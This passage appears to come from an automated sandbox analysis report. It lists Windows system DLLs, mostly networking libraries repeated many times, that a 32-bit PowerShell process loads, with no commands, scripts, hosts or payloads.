Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
